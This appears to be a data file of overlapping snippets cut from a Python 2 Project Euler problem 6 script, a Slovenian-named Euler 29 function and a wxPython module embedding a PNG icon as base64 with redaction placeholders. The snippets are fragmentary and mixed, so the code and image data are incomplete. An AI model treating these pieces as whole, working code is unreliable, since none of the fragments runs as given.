"\"Sum of Squares: \", str(sosq) print \"Squares of Sum: \", str(sqos*sqos) print \"Difference:",
"Squares: \", str(sosq) print \"Squares of Sum: \", str(sqos*sqos) print \"Difference: \", str(diff)",
"0 sqos = 0 for i in range(1, 101): sosq += i*i sqos",
"range(1, 101): sosq += i*i sqos += i diff = (sqos * sqos)",
"= (sqos * sqos) - sosq print \"Sum of Squares: \", str(sosq) print",
"- sosq print \"Sum of Squares: \", str(sosq) print \"Squares of Sum: \",",
"sqos += i diff = (sqos * sqos) - sosq print \"Sum of",
"sosq print \"Sum of Squares: \", str(sosq) print \"Squares of Sum: \", str(sqos*sqos)",
"i diff = (sqos * sqos) - sosq print \"Sum of Squares: \",",
"of Squares: \", str(sosq) print \"Squares of Sum: \", str(sqos*sqos) print \"Difference: \",",
"sosq += i*i sqos += i diff = (sqos * sqos) - sosq",
"for i in range(1, 101): sosq += i*i sqos += i diff =",
"= 0 for i in range(1, 101): sosq += i*i sqos += i",
"#!/usr/bin/python sosq = 0 sqos = 0 for i in range(1, 101): sosq",
"i*i sqos += i diff = (sqos * sqos) - sosq print \"Sum",
"<filename>python/problem6.py #!/usr/bin/python sosq = 0 sqos = 0 for i in range(1, 101):",
"sqos = 0 for i in range(1, 101): sosq += i*i sqos +=",
"0 for i in range(1, 101): sosq += i*i sqos += i diff",
"+= i diff = (sqos * sqos) - sosq print \"Sum of Squares:",
"(sqos * sqos) - sosq print \"Sum of Squares: \", str(sosq) print \"Squares",
"print \"Sum of Squares: \", str(sosq) print \"Squares of Sum: \", str(sqos*sqos) print",
"101): sosq += i*i sqos += i diff = (sqos * sqos) -",
"diff = (sqos * sqos) - sosq print \"Sum of Squares: \", str(sosq)"
] |
[
"stevila = set() for a in range(2,a_max+1): for b in range(2,b_max+1): stevila.add(a**b) return",
"= set() for a in range(2,a_max+1): for b in range(2,b_max+1): stevila.add(a**b) return len(stevila)",
"različne_potence(a_max,b_max): stevila = set() for a in range(2,a_max+1): for b in range(2,b_max+1): stevila.add(a**b)",
"set() for a in range(2,a_max+1): for b in range(2,b_max+1): stevila.add(a**b) return len(stevila) različne_potence(100,100)",
"def različne_potence(a_max,b_max): stevila = set() for a in range(2,a_max+1): for b in range(2,b_max+1):",
"<filename>euler-29.py def različne_potence(a_max,b_max): stevila = set() for a in range(2,a_max+1): for b in"
] |
[
"generated by C:\\Python27\\Scripts\\img2py # from wx.lib.embeddedimage import PyEmbeddedImage fu4028 = PyEmbeddedImage( \"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B\" \"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t\"",
"\"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\"",
"\"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\"",
"\"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\" \"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA\" \"AAAASUVORK5CYII=\") getfu4028Data = fu4028.GetData getfu4028Image =",
"was generated by C:\\Python27\\Scripts\\img2py # from wx.lib.embeddedimage import PyEmbeddedImage fu4028 = PyEmbeddedImage( \"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B\"",
"\"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\"",
"\"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\"",
"file was generated by C:\\Python27\\Scripts\\img2py # from wx.lib.embeddedimage import PyEmbeddedImage fu4028 = PyEmbeddedImage(",
"\"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\"",
"\"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\"",
"\"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\" \"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA\" \"AAAASUVORK5CYII=\") getfu4028Data = fu4028.GetData getfu4028Image",
"\"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp\" \"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3\" \"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H\" \"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH\" \"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\"",
"\"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\"",
"\"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\"",
"\"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\"",
"from wx.lib.embeddedimage import PyEmbeddedImage fu4028 = PyEmbeddedImage( \"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B\" \"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t\" \"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk\" \"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp\" \"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3\" \"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H\"",
"\"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\" \"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA\" \"AAAASUVORK5CYII=\")",
"\"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\"",
"\"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN\" \"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK\" \"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\" \"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA\" \"AAAASUVORK5CYII=\") getfu4028Data",
"\"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\"",
"\"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk\" \"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp\" \"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3\" \"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H\" \"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH\" \"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\"",
"\"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH\" \"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\"",
"\"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM\" \"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW\" \"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy\" \"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA\" \"AAAASUVORK5CYII=\") getfu4028Data = fu4028.GetData getfu4028Image = fu4028.GetImage getfu4028Bitmap =",
